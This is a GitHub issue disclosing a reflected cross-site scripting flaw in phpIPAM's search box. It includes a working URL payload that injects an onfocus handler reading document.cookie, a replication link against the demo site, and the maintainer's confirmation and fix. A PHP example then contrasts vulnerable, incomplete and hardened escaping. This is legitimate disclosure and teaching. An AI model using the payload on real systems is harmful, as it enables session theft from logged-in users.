Cross Site script #1521

Closed
OldFRE opened this issue Oct 26, 2017 · 2 comments

OldFRE commented Oct 26, 2017

payload:
/?ip=555-555-0199@example.comoxkrl'onfocus%3d'alert(document.cookie)'autofocus%3d'vc2hr

Utilization method:

  1. First, log in with an account and password
  2. Copy the payload directly after the site's domain name

Vulnerability location:
Home search box after login

Official demo vulnerability replication:
http://demo.phpipam.net/?ip=555-555-0199@example.comoxkrl'onfocus%3d'alert(document.cookie)'autofocus%3d'vc2hr


phpipam commented Oct 27, 2017

Hi, thanks for reporting, also via email. I can confirm the issue. Will provide a fix.

phpipam self-assigned this Oct 27, 2017
phpipam added the bug label Oct 27, 2017
phpipam added this to the 1.3 milestone Oct 27, 2017

phpipam commented Oct 27, 2017

Fixed. Thanks
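
The reported value closes a single-quoted attribute and appends `onfocus` and `autofocus` attributes, so the output encoding has to cover the single quote. The PHP below is an added example, not phpIPAM's code or the fix referenced in this thread; it assumes a hypothetical template that echoes the `ip` parameter into a single-quoted `value` attribute, and the `render_search_*` and `breaks_out_of_value` names are invented for illustration.

```php
<?php
// Hypothetical search-box renderers; phpIPAM's real template is not shown in the thread.

// Vulnerable: the raw parameter is concatenated into a single-quoted attribute.
function render_search_vulnerable(string $ip): string {
    return "<input type='text' name='ip' value='" . $ip . "'>";
}

// Incomplete: ENT_COMPAT (the default flag set before PHP 8.1) encodes & < > "
// but leaves the single quote untouched, so the attribute can still be closed.
function render_search_incomplete(string $ip): string {
    return "<input type='text' name='ip' value='"
        . htmlspecialchars($ip, ENT_COMPAT, 'UTF-8') . "'>";
}

// Hardened: ENT_QUOTES also encodes ' as &#039;, so the value stays inside the attribute.
function render_search_hardened(string $ip): string {
    return "<input type='text' name='ip' value='"
        . htmlspecialchars($ip, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "'>";
}

// True when the value attribute ends before the closing '>' of the tag,
// i.e. something supplied by the request ended up outside the attribute value.
function breaks_out_of_value(string $html): bool {
    return preg_match("/value='[^']*'(?!>)/", $html) === 1;
}

// The value from the report, URL-decoded the way PHP populates $_GET['ip'].
$ip = urldecode(
    "555-555-0199@example.comoxkrl'onfocus%3d'alert(document.cookie)'autofocus%3d'vc2hr"
);

foreach (['vulnerable', 'incomplete', 'hardened'] as $variant) {
    $render = "render_search_$variant";
    $html = $render($ip);
    printf(
        "%-10s breakout=%s\n  %s\n",
        $variant,
        breaks_out_of_value($html) ? 'yes' : 'no',
        $html
    );
}
```

Only the `ENT_QUOTES` variant reports `breakout=no`; the same value through `ENT_COMPAT` is emitted unchanged because it contains none of the characters that flag set encodes.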
